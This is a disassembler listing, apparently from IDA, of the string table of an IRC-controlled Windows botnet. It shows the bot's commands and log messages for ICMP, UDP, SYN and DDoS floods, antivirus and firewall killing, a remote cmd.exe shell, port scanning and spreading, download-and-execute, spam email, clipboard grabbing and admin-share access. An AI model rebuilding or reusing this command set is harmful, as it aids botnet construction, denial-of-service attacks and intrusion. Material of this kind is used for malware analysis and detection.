aFileRenameSToS db '[FILE]: Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_4078FA+2AF5�o
align 4
aIcmpInvalidFlo db '[ICMP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_4078FA+2ABA�o
align 10h
aIcmpFailedToSt db '[ICMP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_4078FA+2A92�o
align 4
aIcmpFloodingSF db '[ICMP]: Flooding: (%s) for %s seconds.',0 ; DATA XREF: sub_4078FA+2A22�o
align 4
aClonesFailedTo db '[CLONES]: Failed to start clone thread, error: <%d>.',0
; DATA XREF: sub_4078FA+2996�o
align 4
aClonesCreatedO db '[CLONES]: Created on %s:%d, in channel %s.',0
; DATA XREF: sub_4078FA+2933�o
align 10h
aDownloadFailed db '[DOWNLOAD]: Failed to start transfer thread, error: <%d>.',0
; DATA XREF: sub_4078FA+28A8�o
align 4
aDownloadDown_1 db '[DOWNLOAD]: Downloading URL: %s to: %s.',0 ; DATA XREF: sub_4078FA+2849�o
aRedirectFailed db '[REDIRECT]: Failed to start redirection thread, error: <%d>.',0
; DATA XREF: sub_4078FA+2706�o
align 4
aRedirectTcpRed db '[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.',0
; DATA XREF: sub_4078FA+26AB�o
aScanFailedTo_0 db '[SCAN]: Failed to start scan thread, error: <%d>.',0
; DATA XREF: sub_4078FA+25EA�o
; sub_4078FA+3C98�o ...
align 10h
aScanPortScanSt db '[SCAN]: Port scan started: %s:%d with delay: %d(ms).',0
; DATA XREF: sub_4078FA+2589�o
align 4
aSSS_1 db '[%s] <%s> %s',0 ; DATA XREF: sub_4078FA+2503�o
align 4
aSSS_2 db '[%s] * %s %s',0 ; DATA XREF: sub_4078FA+23E8�o
align 4
dword_425A58 dd 54434101h, 204E4F49h, 17325h ; sub_4078FA+31EC�o
dword_425A64 dd 615F63h aC_action db 'c_action',0 ; DATA XREF: sub_4078FA+22C3�o
align 4
aC_pm db 'c_pm',0 ; DATA XREF: sub_4078FA+22AF�o
align 4
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_4078FA+229B�o
align 4
aSc db 'sc',0 ; DATA XREF: sub_4078FA+2287�o
align 4
aScan db 'scan',0 ; DATA XREF: sub_4078FA+2273�o
align 4
aRd db 'rd',0 ; DATA XREF: sub_4078FA+225F�o
align 4
aRedirect db 'redirect',0 ; DATA XREF: sub_4078FA+224B�o
align 4
aDl db 'dl',0 ; DATA XREF: sub_4078FA+2237�o
align 4
aDownload db 'download',0 ; DATA XREF: sub_4078FA+2223�o
align 4
aC: ; DATA XREF: sub_4078FA+220F�o
unicode 0, <c>,0
aClone_0 db 'clone',0 ; DATA XREF: sub_4078FA+21FB�o
align 10h
aIcmp db 'icmp',0 ; DATA XREF: sub_4078FA+21D5�o
align 4
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_4078FA+21C1�o
align 4
aMv db 'mv',0 ; DATA XREF: sub_4078FA+21AD�o
align 4
aRename db 'rename',0 ; DATA XREF: sub_4078FA+2199�o
align 10h
aE: ; DATA XREF: sub_4078FA+2185�o
unicode 0, <e>,0
aExecute db 'execute',0 ; DATA XREF: sub_4078FA+2171�o
aUpdate db 'update',0 ; DATA XREF: sub_4078FA+2149�o
align 4
aDe db 'de',0 ; DATA XREF: sub_4078FA+2135�o
align 4
aDelay db 'delay',0 ; DATA XREF: sub_4078FA+2121�o
align 10h
aRp db 'rp',0 ; DATA XREF: sub_4078FA+210D�o
align 4
aRepeat db 'repeat',0 ; DATA XREF: sub_4078FA+20F9�o
; sub_4078FA+2E7F�o
align 4
aC_p db 'c_p',0 ; DATA XREF: sub_4078FA+20E5�o
aC_part db 'c_part',0 ; DATA XREF: sub_4078FA+20D1�o
align 4
aC_j db 'c_j',0 ; DATA XREF: sub_4078FA+20BD�o
aC_join db 'c_join',0 ; DATA XREF: sub_4078FA+20A9�o
align 4
aC_n db 'c_n',0 ; DATA XREF: sub_4078FA+2095�o
aC_nick db 'c_nick',0 ; DATA XREF: sub_4078FA+2081�o
align 10h
aC_m db 'c_m',0 ; DATA XREF: sub_4078FA+206D�o
aC_mode db 'c_mode',0 ; DATA XREF: sub_4078FA+2059�o
align 4
aC_r db 'c_r',0 ; DATA XREF: sub_4078FA+2045�o
aC_raw db 'c_raw',0 ; DATA XREF: sub_4078FA+2031�o
align 4
aM: ; DATA XREF: sub_4078FA+201D�o
unicode 0, <m>,0
aMode db 'mode',0 ; DATA XREF: sub_4078FA+2009�o
align 4
aCy db 'cy',0 ; DATA XREF: sub_4078FA+1FF5�o
align 4
aCycle db 'cycle',0 ; DATA XREF: sub_4078FA+1FE1�o
align 10h
aA_1: ; DATA XREF: sub_4078FA+1FCD�o
unicode 0, <a>,0
aAction db 'action',0 ; DATA XREF: sub_4078FA+1FB9�o
align 4
aPm_0 db 'pm',0 ; DATA XREF: sub_4078FA+1FA5�o
align 10h
aPrivmsg_0 db 'privmsg',0 ; DATA XREF: sub_4078FA+1F91�o
aAa db 'aa',0 ; DATA XREF: sub_4078FA+1F7D�o
align 4
aAddalias db 'addalias',0 ; DATA XREF: sub_4078FA+1F69�o
align 4
aAvfwFailedToSt db '[AVFW]: Failed to start AV/FW killer thread, error: <%d>.',0
; DATA XREF: sub_4078FA+1EF1�o
align 4
aAvfw db '[AVFW]',0 ; DATA XREF: sub_4078FA+1E97�o
; sub_4078FA+1F49�o
align 4
aKillerThread db 'Killer Thread',0 ; DATA XREF: sub_4078FA+1E92�o
; sub_4078FA+1F44�o
align 4
aAvfwAvFwBotKil db '[AVFW]: AV/FW/BOT Killer active.',0 ; DATA XREF: sub_4078FA+1E7C�o
align 10h
aAvfwkiller db 'avfwkiller',0 ; DATA XREF: sub_4078FA+1E51�o
align 4
aGh db 'gh',0 ; DATA XREF: sub_4078FA+1E3D�o
align 10h
aGethost db 'gethost',0 ; DATA XREF: sub_4078FA+1E29�o
aNetCommandUnkn db '[NET]: Command unknown.',0 ; DATA XREF: sub_4078FA:loc_40970F�o
aNetNoMessageSp db '[NET]: No message specified.',0 ; DATA XREF: sub_4078FA:loc_409708�o
align 10h
aNetUserListFai db '[NET]: User list failed.',0 ; DATA XREF: sub_4078FA:loc_4096BB�o
align 4
aNetUserListCom db '[NET]: User list completed.',0 ; DATA XREF: sub_4078FA+1DB7�o
aNetShareListFa db '[NET]: Share list failed.',0 ; DATA XREF: sub_4078FA:loc_409619�o
align 4
aNetShareListCo db '[NET]: Share list completed.',0 ; DATA XREF: sub_4078FA+1D15�o
align 4
aShare db 'share',0 ; DATA XREF: sub_4078FA+1CA9�o
align 4
aContinue db 'continue',0 ; DATA XREF: sub_4078FA+1C75�o
align 4
aPause db 'pause',0 ; DATA XREF: sub_4078FA+1C5E�o
align 10h
aStop db 'stop',0 ; DATA XREF: sub_4078FA+1C47�o
; sub_4078FA+1F2B�o
align 4
aNetServiceLi_0 db '[NET]: Service list failed.',0 ; DATA XREF: sub_4078FA:loc_409533�o
aNetServiceList db '[NET]: Service list completed.',0 ; DATA XREF: sub_4078FA+1C2F�o
align 4
aStart db 'start',0 ; DATA XREF: sub_4078FA+1BDC�o
; sub_4078FA+1E66�o
align 4
aNetFailedToLoa db '[NET]: Failed to load advapi32.dll or netapi32.dll.',0
; DATA XREF: sub_4078FA+1BA2�o
aNet db 'net',0 ; DATA XREF: sub_4078FA+1B80�o
aRf db 'rf',0 ; DATA XREF: sub_4078FA+1B6C�o
align 4
aReadfile db 'readfile',0 ; DATA XREF: sub_4078FA+1B58�o
align 4
aCm db 'cm',0 ; DATA XREF: sub_4078FA+1B44�o
align 4
aCmd db 'cmd',0 ; DATA XREF: sub_4078FA+1B30�o
aMirc db 'mirc',0 ; DATA XREF: sub_4078FA+1B1C�o
align 4
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_4078FA+1B08�o
aLi db 'li',0 ; DATA XREF: sub_4078FA+1AF4�o
align 10h
aList_0 db 'list',0 ; DATA XREF: sub_4078FA+1AE0�o
align 4
aDel db 'del',0 ; DATA XREF: sub_4078FA+1ACC�o
aDelete db 'delete',0 ; DATA XREF: sub_4078FA+1AB8�o
; sub_4078FA+1C8F�o
align 4
aKi db 'ki',0 ; DATA XREF: sub_4078FA+1AA4�o
align 4
aKill db 'kill',0 ; DATA XREF: sub_4078FA+1A90�o
align 10h
aKdp db 'kdp',0 ; DATA XREF: sub_4078FA+1A7C�o
aKilldelproc db 'killdelproc',0 ; DATA XREF: sub_4078FA+1A68�o
aKp db 'kp',0 ; DATA XREF: sub_4078FA+1A54�o
align 4
aKillproc db 'killproc',0 ; DATA XREF: sub_4078FA+1A40�o
align 10h
aDn db 'dn',0 ; DATA XREF: sub_4078FA+1A2C�o
align 4
aDns db 'dns',0 ; DATA XREF: sub_4078FA+1A18�o
aSe db 'se',0 ; DATA XREF: sub_4078FA+1A04�o
align 4
aO: ; DATA XREF: sub_4078FA+19DC�o
unicode 0, <o>,0
aOpen db 'open',0 ; DATA XREF: sub_4078FA+19C8�o
; sub_4078FA+373F�o ...
align 4
aPr db 'pr',0 ; DATA XREF: sub_4078FA+19B4�o
align 4
aPrefix db 'prefix',0 ; DATA XREF: sub_4078FA+19A0�o
align 4
aC_rn db 'c_rn',0 ; DATA XREF: sub_4078FA+198C�o
align 4
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_4078FA+1978�o
align 4
aC_q db 'c_q',0 ; DATA XREF: sub_4078FA+1964�o
aC_quit db 'c_quit',0 ; DATA XREF: sub_4078FA+1950�o
align 4
aK: ; DATA XREF: sub_4078FA+193C�o
unicode 0, <k>,0
aKillthread db 'killthread',0 ; DATA XREF: sub_4078FA+1928�o
align 4
aRaw db 'raw',0 ; DATA XREF: sub_4078FA+1900�o
aPt db 'pt',0 ; DATA XREF: sub_4078FA+18EC�o
align 4
aPart_0 db 'part',0 ; DATA XREF: sub_4078FA+18D8�o
align 4
aJ: ; DATA XREF: sub_4078FA+18C4�o
unicode 0, <j>,0
aJoin db 'join',0 ; DATA XREF: sub_4078FA+18B0�o
align 10h
aN: ; DATA XREF: sub_4078FA+189C�o
unicode 0, <n>,0
aNick_0 db 'nick',0 ; DATA XREF: sub_4078FA+1888�o
align 4
aScanall db 'scanall',0 ; DATA XREF: sub_4078FA+184E�o
aTftp db 'tftp',0 ; DATA XREF: sub_4078FA+183A�o
align 4
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_4078FA+1826�o
align 4
aHttp db 'http',0 ; DATA XREF: sub_4078FA+1812�o
align 10h
aHttpserver db 'httpserver',0 ; DATA XREF: sub_4078FA+17FE�o
align 4
aRlogin db 'rlogin',0 ; DATA XREF: sub_4078FA+17EA�o
align 4
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_4078FA+17D6�o
align 4
aCip db 'cip',0 ; DATA XREF: sub_4078FA+17C2�o
aCurrentip db 'currentip',0 ; DATA XREF: sub_4078FA+17AE�o
align 4
aFdns db 'fdns',0 ; DATA XREF: sub_4078FA+179A�o
align 4
aFlushdns db 'flushdns',0 ; DATA XREF: sub_4078FA+1786�o
align 4
aFarp db 'farp',0 ; DATA XREF: sub_4078FA+1772�o
align 10h
aFlusharp db 'flusharp',0 ; DATA XREF: sub_4078FA+175E�o
align 4
aGc db 'gc',0 ; DATA XREF: sub_4078FA+174A�o
align 10h
aGetclip db 'getclip',0 ; DATA XREF: sub_4078FA+1736�o
aEmailMessageSe db '[EMAIL]: Message sent to %s.',0 ; DATA XREF: sub_4078FA+16EC�o
align 4
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_4078FA+166B�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
a_: ; DATA XREF: sub_4078FA+15CB�o
unicode 0, <_>,0
aEmail db 'email',0 ; DATA XREF: sub_4078FA+1560�o
align 10h
aTcp db 'tcp',0 ; DATA XREF: sub_4078FA+154C�o
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_4078FA+1538�o
align 10h
aP: ; DATA XREF: sub_4078FA+1524�o
unicode 0, <p>,0
aPing_0 db 'ping',0 ; DATA XREF: sub_4078FA+1510�o
align 4
aPingflood db 'pingflood',0 ; DATA XREF: sub_4078FA+14FC�o
align 4
aU: ; DATA XREF: sub_4078FA+14E8�o
unicode 0, <u>,0
aUdp db 'udp',0 ; DATA XREF: sub_4078FA+14D4�o
aUdpflood db 'udpflood',0 ; DATA XREF: sub_4078FA+14C0�o
align 4
aAsc db 'asc',0 ; DATA XREF: sub_4078FA+14AC�o
aAdvscan db 'advscan',0 ; DATA XREF: sub_4078FA+1498�o
aMainLoginListC db '[MAIN]: Login list complete.',0 ; DATA XREF: sub_4078FA+1474�o
align 4
aD_S db '%d. %s',0 ; DATA XREF: sub_4078FA+1440�o
; sub_410F55+46�o
align 10h
aEmpty db '<Empty>',0 ; DATA XREF: sub_4078FA+1433�o
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_4078FA+1410�o
align 4
aWho db 'who',0 ; DATA XREF: sub_4078FA+13F7�o
aCmd_0 db '[CMD]',0 ; DATA XREF: sub_4078FA+13E9�o
align 4
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_4078FA+13E4�o
align 4
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_4078FA+13CF�o
aOcmd db 'ocmd',0 ; DATA XREF: sub_4078FA+13BB�o
align 4
aOpencmd db 'opencmd',0 ; DATA XREF: sub_4078FA+13A7�o
aDll db 'dll',0 ; DATA XREF: sub_4078FA+1393�o
aTestdlls db 'testdlls',0 ; DATA XREF: sub_4078FA+137F�o
align 4
aDrv db 'drv',0 ; DATA XREF: sub_4078FA+136B�o
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_4078FA+1357�o
align 4
aUp db 'up',0 ; DATA XREF: sub_4078FA+1343�o
; sub_4078FA+215D�o
align 10h
aUptime db 'uptime',0 ; DATA XREF: sub_4078FA+132F�o
align 4
aPs db 'ps',0 ; DATA XREF: sub_4078FA+131B�o
align 4
aProcs db 'procs',0 ; DATA XREF: sub_4078FA+1307�o
align 4
aErradicate db 'erradicate',0 ; DATA XREF: sub_4078FA+12F3�o
align 10h
aDestroy db 'destroy',0 ; DATA XREF: sub_4078FA+12DF�o
aSi db 'si',0 ; DATA XREF: sub_4078FA+12CB�o
align 4
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_4078FA+12B7�o
aNi db 'ni',0 ; DATA XREF: sub_4078FA+12A3�o
align 4
aNetinfo db 'netinfo',0 ; DATA XREF: sub_4078FA+128F�o
aClg db 'clg',0 ; DATA XREF: sub_4078FA+127B�o
aClearlog db 'clearlog',0 ; DATA XREF: sub_4078FA+1267�o
align 10h
aLg db 'lg',0 ; DATA XREF: sub_4078FA+1253�o
align 4
aLog_0 db 'log',0 ; DATA XREF: sub_4078FA+123F�o
; sub_4197D8:loc_419863�o ...
aAl db 'al',0 ; DATA XREF: sub_4078FA+122B�o
align 4
aAliases db 'aliases',0 ; DATA XREF: sub_4078FA+1217�o
aT: ; DATA XREF: sub_4078FA+1203�o
unicode 0, <t>,0
aThreads db 'threads',0 ; DATA XREF: sub_4078FA+11EF�o
aMainFailedToRe db '[MAIN]: Failed to reboot system.',0 ; DATA XREF: sub_4078FA+11B7�o
align 4
aMainRebootingS db '[MAIN]: Rebooting system.',0 ; DATA XREF: sub_4078FA+11B0�o
align 10h
aReboot db 'reboot',0 ; DATA XREF: sub_4078FA+119D�o
align 4
aI_0: ; DATA XREF: sub_4078FA+1189�o
unicode 0, <i>,0
aId db 'id',0 ; DATA XREF: sub_4078FA+1175�o
align 10h
aS_3: ; DATA XREF: sub_4078FA+1161�o
unicode 0, <s>,0
aStatus db 'status',0 ; DATA XREF: sub_4078FA+114D�o
align 4
aQ: ; DATA XREF: sub_4078FA+1139�o
unicode 0, <q>,0
aQuit_0 db 'quit',0 ; DATA XREF: sub_4078FA+1125�o
align 4
aDc db 'dc',0 ; DATA XREF: sub_4078FA+1111�o
align 4
aDisconnect db 'disconnect',0 ; DATA XREF: sub_4078FA+10FD�o
align 4
aR: ; DATA XREF: sub_4078FA+10E9�o
; sub_4078FA+1914�o ...
unicode 0, <r>,0
aReconnect db 'reconnect',0 ; DATA XREF: sub_4078FA+10D5�o
align 4
aStats db 'stats',0 ; DATA XREF: sub_4078FA+10C1�o
align 10h
aScanstats db 'scanstats',0 ; DATA XREF: sub_4078FA+10AD�o
align 4
aScan_0 db '[SCAN]',0 ; DATA XREF: sub_4078FA+109F�o
; sub_4078FA+5455�o
align 4
aScan_1 db 'Scan',0 ; DATA XREF: sub_4078FA+109A�o
align 4
aScanstop db 'scanstop',0 ; DATA XREF: sub_4078FA+1085�o
align 4
aSecure_1 db '[SECURE]',0 ; DATA XREF: sub_4078FA+1077�o
align 4
aSecure_0 db 'Secure',0 ; DATA XREF: sub_4078FA+1072�o
align 4
aSecurestop db 'securestop',0 ; DATA XREF: sub_4078FA+105D�o
align 4
aClones db '[CLONES]',0 ; DATA XREF: sub_4078FA+104F�o
align 4
aClone db 'Clone',0 ; DATA XREF: sub_4078FA+104A�o
align 4
aClonestop db 'clonestop',0 ; DATA XREF: sub_4078FA+1035�o
align 4
aPsstop db 'psstop',0 ; DATA XREF: sub_4078FA+1021�o
align 10h
aProcsstop db 'procsstop',0 ; DATA XREF: sub_4078FA+100D�o
align 4
aTftp_0 db '[TFTP]',0 ; DATA XREF: sub_4078FA+FFF�o
align 4
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_4078FA+FE5�o
align 10h
aTcpFlood db 'TCP flood',0 ; DATA XREF: sub_4078FA+FDA�o
align 4
aTcpstop db 'tcpstop',0 ; DATA XREF: sub_4078FA+FC5�o
aIcmp_0 db '[ICMP]',0 ; DATA XREF: sub_4078FA:loc_4088B1�o
align 4
aIcmpFlood db 'ICMP flood',0 ; DATA XREF: sub_4078FA+FB2�o
align 4
aIcmpstop db 'icmpstop',0 ; DATA XREF: sub_4078FA+F9D�o
align 4
aPing_1 db '[PING]',0 ; DATA XREF: sub_4078FA+F8F�o
align 4
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_4078FA+F8A�o
align 4
aPingstop db 'pingstop',0 ; DATA XREF: sub_4078FA+F75�o
align 4
aUpd db '[UPD]',0 ; DATA XREF: sub_4078FA+F67�o
align 4
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_4078FA+F62�o
align 4
aUdpstop db 'udpstop',0 ; DATA XREF: sub_4078FA+F4D�o
aSyn db '[SYN]',0 ; DATA XREF: sub_4078FA+F3F�o
align 4
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_4078FA+F3A�o
align 4
aSynstop db 'synstop',0 ; DATA XREF: sub_4078FA+F25�o
aDdos db '[DDoS]',0 ; DATA XREF: sub_4078FA+F17�o
align 4
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_4078FA+F12�o
align 10h
aDdos_stop db 'ddos.stop',0 ; DATA XREF: sub_4078FA+EFD�o
align 4
aRedirect_0 db '[REDIRECT]',0 ; DATA XREF: sub_4078FA+EEF�o
align 4
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_4078FA+EEA�o
align 4
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_4078FA+ED5�o
align 4
aLog db '[LOG]',0 ; DATA XREF: sub_4078FA+EC7�o
align 10h
aLogList db 'Log list',0 ; DATA XREF: sub_4078FA+EC2�o
align 4
aLogstop db 'logstop',0 ; DATA XREF: sub_4078FA+EAD�o
aHttpd db '[HTTPD]',0 ; DATA XREF: sub_4078FA+E9F�o
aHttpstop db 'httpstop',0 ; DATA XREF: sub_4078FA+E85�o
align 4
aRlogind db '[RLOGIND]',0 ; DATA XREF: sub_4078FA+E77�o
align 4
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_4078FA+E5D�o
align 10h
aSocks4_0 db '[SOCKS4]',0 ; DATA XREF: sub_4078FA+E4F�o
align 4
aServer_0 db 'Server',0 ; DATA XREF: sub_4078FA+E4A�o
; sub_4078FA+E72�o ...
align 4
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_4078FA+E35�o
align 10h
aS4 db 's4',0 ; DATA XREF: sub_4078FA+E21�o
align 4
aSocks4 db 'socks4',0 ; DATA XREF: sub_4078FA+E0D�o
align 4
aUnsec db 'unsec',0 ; DATA XREF: sub_4078FA+DF9�o
align 4
aUnsecure db 'unsecure',0 ; DATA XREF: sub_4078FA+DE5�o
align 10h
aSec db 'sec',0 ; DATA XREF: sub_4078FA+DD1�o
; sub_4078FA+49A9�o
aSecure db 'secure',0 ; DATA XREF: sub_4078FA+DBD�o
; sub_4078FA+4999�o
align 4
aVer db 'ver',0 ; DATA XREF: sub_4078FA+DA9�o
aVersion db 'version',0 ; DATA XREF: sub_4078FA+D95�o
aLo db 'lo',0 ; DATA XREF: sub_4078FA+D81�o
align 4
aLogout db 'logout',0 ; DATA XREF: sub_4078FA+D6D�o
align 4
aD: ; DATA XREF: sub_4078FA+D59�o
unicode 0, <d>,0
aDie db 'die',0 ; DATA XREF: sub_4078FA+D45�o
aRn db 'rn',0 ; DATA XREF: sub_4078FA+D31�o
align 10h
aRndnick db 'rndnick',0 ; DATA XREF: sub_4078FA+D1A�o
a63 db '63',0 ; DATA XREF: sub_4078FA+BF9�o
align 4
asc_42635C: ; DATA XREF: sub_4078FA+BD1�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_4078FA+B96�o
align 4
aServer_1 db '$server',0 ; DATA XREF: sub_4078FA+B8B�o
aRndnick_0 db '$rndnick',0 ; DATA XREF: sub_4078FA+B7A�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_4078FA+B5C�o
align 4
aUser_2 db '$user',0 ; DATA XREF: sub_4078FA+B4B�o
align 4
aMe db '$me',0 ; DATA XREF: sub_4078FA+B39�o
aD_0 db '$%d',0 ; DATA XREF: sub_4078FA+AC7�o
aD_1 db '$%d-',0 ; DATA XREF: sub_4078FA+A11�o
align 4
dword_42639C dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_4078FA+974�o
dd 0A0Dh
dword_4263B4 dd 4E495001h, 47hdword_4263BC dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_4078FA+937�o
dd 0D017325h, 0Ah
dword_4263D8 dd 52455601h, 4E4F4953h, 1dword_4263E4 dd 23h dword_4263E8 dd 6Ch dword_4263EC dd 323333h ; sub_4078FA+7EF�o ...
aMainJoinedChan db '[MAIN]: Joined channel: %s.',0 ; DATA XREF: sub_4078FA+6F3�o
aMainUserSLog_0 db '[MAIN]: User: %s logged out.',0 ; DATA XREF: sub_4078FA+693�o
align 4
a353 db '353',0 ; DATA XREF: sub_4078FA+641�o
aPart db 'PART',0 ; DATA XREF: sub_4078FA+5C5�o
align 4
aSS_2 db ':%s%s',0 ; DATA XREF: sub_4078FA+596�o
align 10h
aNick db 'NICK',0 ; DATA XREF: sub_4078FA+3E7�o
align 4
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_4078FA+373�o
; sub_4078FA+6D1�o
aMainUserSLogge db '[MAIN]: User %s logged out.',0 ; DATA XREF: sub_4078FA+35A�o
; sub_4078FA+4AF6�o ...
aKick db 'KICK',0 ; DATA XREF: sub_4078FA+2DA�o
align 4
aNickS_0 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_4078FA+271�o
; sub_4078FA+39B6�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_4078FA+24E�o
a@: ; DATA XREF: sub_4078FA+225�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_4078FA+218�o
a005 db '005',0 ; DATA XREF: sub_4078FA+205�o
a001 db '001',0 ; DATA XREF: sub_4078FA+1F2�o
aJoinSS_0 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_4078FA+1D5�o
; sub_4078FA+3184�o ...
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_4078FA+1B3�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_4078FA+19D�o
align 10h
asc_4264C0: ; DATA XREF: sub_4078FA+18B�o
; sub_4078FA+570C�o
unicode 0, <!>,0
aSecureSystemSe db '[SECURE]: System secure monitor active.',0 ; DATA XREF: sub_40D1EF+38F�o
aMainBotStarted db '[MAIN]: Bot started.',0 ; DATA XREF: sub_40D1EF+356�o
align 4
aSDS db '%s %d "%s"',0 ; DATA XREF: sub_40D1EF+286�o
align 10h
aSS_5 db '%s\%s',0 ; DATA XREF: sub_40D1EF+195�o
align 4
aRedirectFail_0 db '[REDIRECT]: Failed to start connection thread, error: <%d>.',0
; DATA XREF: sub_40D7DF+153�o
aRedirectClient db '[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_40D7DF+DB�o
align 4
aRedirectFail_1 db '[REDIRECT]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_40D9BC+13F�o
align 10h
aRedirectClie_0 db '[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_40D9BC+DD�o
align 4
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_40DBAB+35�o
aCmdCouldNotR_0 db '[CMD]: Could not read data from proccess.',0Dh,0Ah,0
; DATA XREF: sub_40DC39:loc_40DD9D�o
aCmdProccessHas db '[CMD]: Proccess has terminated.',0Dh,0Ah,0 ; DATA XREF: sub_40DC39+141�o
align 4
aCmdCouldNotRea db '[CMD]: Could not read data from proccess',0Dh,0Ah,0
; DATA XREF: sub_40DC39:loc_40DD48�o
align 10h
aCmdFailedToSta db '[CMD]: Failed to start IO thread, error: <%d>.',0
; DATA XREF: sub_40DDC6+18E�o
align 10h
aCmdRemoteComma db '[CMD]: Remote Command Prompt',0 ; DATA XREF: sub_40DDC6+146�o
align 10h
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_40DDC6+1F�o
aRlogindProtoco db '[RLOGIND]: Protocol string too long.',0
; DATA XREF: sub_40DF75:loc_40DFA7�o
align 10h
aRlogindLoginRe db '[RLOGIND]: Login rejected, Remote user: <%s@%s>.',0
; DATA XREF: sub_40DFC0+39�o
align 4
aRlogindUserL_0 db '[RLOGIND]: User logged out: <%s@%s>.',0 ; DATA XREF: sub_40E00D+1EF�o
align 4
aRlogindErrorSe db '[RLOGIND]: Error: SessionRun(): <%d>.',0 ; DATA XREF: sub_40E00D+1CF�o
align 4
aRlogindUserLog db '[RLOGIND]: User logged in: <%s@%s>.',0 ; DATA XREF: sub_40E00D+1AF�o
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_40E00D+184�o
align 4
aRlogindErrorGe db '[RLOGIND]: Error: getpeername(): <%d>.',0 ; DATA XREF: sub_40E00D+F4�o
align 4
aRlogindError_0 db '[RLOGIND]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_40E219+215�o
align 4
aRlogindFaile_1 db '[RLOGIND]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_40E219+1C9�o
align 10h
aRlogindClientC db '[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_40E219+158�o
aRlogindReadyAn db '[RLOGIND]: Ready and waiting for incoming connections.',0
; DATA XREF: sub_40E219+FF�o
align 4
aRlogindFaile_0 db '[RLOGIND]: Failed to install control-C handler, error: <%d>.',0
; DATA XREF: sub_40E219+70�o
align 4
aRlogindErrorWs db '[RLOGIND]: Error: WSAStartup(): <%d>.',0 ; DATA XREF: sub_40E219+3E�o
align 10h
aSI db '%s%i',0 ; DATA XREF: sub_40E495+40�o
; .text:0040E590�o ...
align 4
aPc db 'PC',0 ; DATA XREF: .text:0040E55E�o
align 4
aS_5 db '[%s]',0 ; DATA XREF: .text:0040E6C6�o
align 4
a??? db '???',0 ; DATA XREF: .text:loc_40E6BD�o
; sub_40FE1F:loc_40FEC0�o
a2k3 db '2K3',0 ; DATA XREF: .text:0040E6B6�o
aXp_0 db 'XP',0 ; DATA XREF: .text:0040E6AB�o
; sub_40FE1F+8B�o
align 10h
a2k db '2K',0 ; DATA XREF: .text:0040E69E�o
; sub_40FE1F+7C�o
align 4
aMe_0 db 'ME',0 ; DATA XREF: .text:0040E68B�o
; sub_40FE1F+68�o
align 4
a98 db '98',0 ; DATA XREF: .text:0040E67E�o
; sub_40FE1F+59�o
align 4
aNt db 'NT',0 ; DATA XREF: .text:0040E671�o
; sub_40FE1F+4A�o
align 10h
a95 db '95',0 ; DATA XREF: .text:0040E666�o
; sub_40FE1F+39�o
align 4
aDS db '[%d]%s',0 ; DATA XREF: sub_40E70F+39�o
align 4
aM_0 db '[M]',0 ; DATA XREF: sub_40E70F+2B�o
; sub_40E70F+50�o
aScanIpSPortD_0 db '[SCAN]: IP: %s Port: %d is open.',0 ; DATA XREF: sub_40E83D+85�o
align 4
aScanScanningIp db '[SCAN]: Scanning IP: %s, Port: %d.',0 ; DATA XREF: sub_40E8FF+40�o
align 4
aD_2 db 'D:\',0 ; DATA XREF: .data:0042B30C�o
aD_3 db 'D$',0 ; DATA XREF: .data:0042B308�o
align 10h
aC_2 db 'C:\',0 ; DATA XREF: .data:0042B304�o
aC_3 db 'C$',0 ; DATA XREF: .data:0042B300�o
align 4
aAdmin_0 db 'ADMIN$',0 ; DATA XREF: .data:0042B2F8�o
align 10h
aIpc db 'IPC$',0 ; DATA XREF: .data:off_42B2F0�o
align 4
aSecureNetapi32 db '[SECURE]: Netapi32.dll couldn',27h,'t be loaded.',0
